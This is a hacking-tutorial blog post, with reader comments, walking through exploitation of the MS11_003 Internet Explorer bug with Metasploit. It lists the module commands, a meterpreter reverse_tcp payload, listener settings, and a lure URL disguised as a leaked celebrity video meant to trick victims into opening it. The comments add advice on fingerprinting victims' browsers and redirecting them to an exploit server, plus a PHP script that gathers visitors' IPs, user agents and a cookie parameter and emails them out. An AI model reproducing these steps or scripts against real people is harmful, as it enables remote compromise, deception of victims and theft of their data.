Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework
Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5
Victim O.S : Windows 7 SP 1
Victim Browser : Internet Explorer 8
Microsoft Internet Explorer have another vulnerability after so many vulnerability have found by security researcher. The MS11_003 vulnerability actually found at February 08, 2011 according to Microsoft security bulletin.
In this tutorial we will try to exploit that vulnerability MS11_003 using metasploit module ms11_003_ie_css_import. According to metasploit website :
This module exploits a memory corruption vulnerability within Microsoft\’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Lets prepare the attack! :
Requirement :
1. Metasploit Framework (website)
2. Operating System (I’m use Backtrack 5 in this tutorial)
3. ms11_003_ie_css_import exploit — download from mediafire.com
Step By Step :
1. For the first step, you need to update your metasploit framework to the latest version by running msfupdate command. If you didn’t have internet connection to upload, you can download the exploit above and copy to /pentest/exploits/framework3/modules/exploits/windows/browser.
2. The next step we need to use the exploit module ms11_003_ie_css_import by using use exploit/windows/browser/ms11_003_ie_css_import command. In this tutorial I’m using the meterpreter reverse_tcp payload, but you can change another payload to suit your mood.
3. After finished set up exploit and payload, we need to set up and configure the options. In this picture below I’m configuring the options that needed to perform an attack according to my thoughts.
Legends :
set srvhost 192.168.8.93 --> set up our server address change the ip to your IP. set srvport 80 --> set server port to handle request from victim. port 80 is the best social engineering. set uripath avril-video-leaked.avi --> make the victim curious about the link you've given so they want to open it. set lhost 192.168.8.93 --> set up the IP address that will use to connect back when victim successfully exploited. set lport 443 --> port that will be used by our payload when exploit successfully perform. exploit --> perform the exploit to generate link that will be used in our attack http://192.168.8.93/avril-video-leaked.avi --> This is the URL that will be given to victim.
4. When victim open the malicious link we’ve given, here’s the screenshot in attacker console.
The print screen above tell us that attack has performed successfully and now act as notepad.exe process on victim computer.
5. To make sure are we got active sessions from victim or not, do sessions -l command to view active sessions.
6. Looks like great! we’ve get an active sessions, let’s interract with that session by using sessions -i 1 and doing something.
PWNED!
Countermeasure :
1. Always update your browser to the latest version
2. Don’t open link that you didn’t know
hope it’s useful 
Incoming search terms:
- ms11_003_ie_css_import
- armitage No active sessions
- metasploit xp sp3
- ms11_003
- exploit
- metasploit exploit port 443
- metasploit meterpreter
- use exploit/windows/browser/ms11_003_ie_css_import
- hack internet explorer 9 metasploit
- port 80 exploit metasploit
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
14 Responsesto “Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework”
Trackbacks/Pingbacks
- How to Share Folder in Backtrack 5 R1 to Make Accessible in Windows | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] because sometimes you will use that port for another process(set payload or browser exploit like this). [...]
- How to Port Forward Browser Exploit From Router to Your Exploit Server | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick - [...] I use the exploit for this tips and trick from this hacking tutorial (http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-usin...) but I change the SRVPORT ...
Leave a Reply
Links
Get Updates via Networkedblogs
hello..your site is good..i like your tutorials. Please help me with a doubt.I run BT5 on virtual box and use windows 7 and XP VM's for pentesting….while using a browser based client side exploit,metasploit generates a link for us which the target will hav to run in his browser so that the exploit runs and we get a session…my question is that the link that metasploit generates is of the form 192.168.56.101:8080 or 10.0.2.15 … These two address belong to the local network I hope… Can we target any user on the internet using these browser based exploit? how can we generate a global link which can be sent to any target?
#darklord
You can view my other tutorial here http://www.hacking-tutorial.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/ about the logic.
Hi thanks forwarding tuts ..brower based attack is good but i try to do something else i might be thinking wrong . what i try to do is WAN ip traffic —>forward to–>Lan host pc .. then perform MITM attack
trying to do same mitm over wan ip as we do in lan network
i think iptables here could do some magic .
so much confusion lol ))
Before I meant what should I write on my HTML page to find the vulnerabilities of the victim that will click the link that i will send? How can i find which version of internet Explorer or whatever browser victim uses? I ask these things because I think that I need this kind of informations for this type of attack. If am i wrong correct me….
#Baldassarre
If you familiar with server side scripting(e.g : php), you can use HTTP_USER_AGENT
check the type and version of the user browser, and if match, redirect it to exploit server.
How can I find the vulnerabilities of the victim's computer with a malicious link? What I should write in my html page? Please give an answer.
#dean
Maybe you can view my last comment to Baldassare
Thanks i 've just tried and now i know how to view the victim's user agent but what about adobe reader, flash player, Windows media player versions? I can't find anywhere what should i write in the php script to find their versions…
I would like to ask you another question how can redirect to the correct exploit sever? What i supposed to do?
#Baldassarre
I can’t give you answer for it, you can Google for it
This is the script of php that I have found. I would like to found more information about the victim's system but I don't know what I should add in this script.
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "aaranan_12@gmail.com";
$today = date("l, F j, Y, g:i a") ;
$subject = "Indirizzo ip" ;
$message = "Eccoti l'indirizzo ip, con tanto di data e ora dell'invio:
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
I've already tried and I didn't find anything about it. Thanks anyway.
Hey amazing tutorial, but when i tried to download IE 8(i have IE 9 not a default browser) it says its not supported on this system( WIN 7 SP1) Any idea?
#boris
it only works on IE8
My bad, i mean i tried to install IE8, but its says its not supported(Win 7). I dont know wheres the problem or its just cause its Internet Explorer. Thank you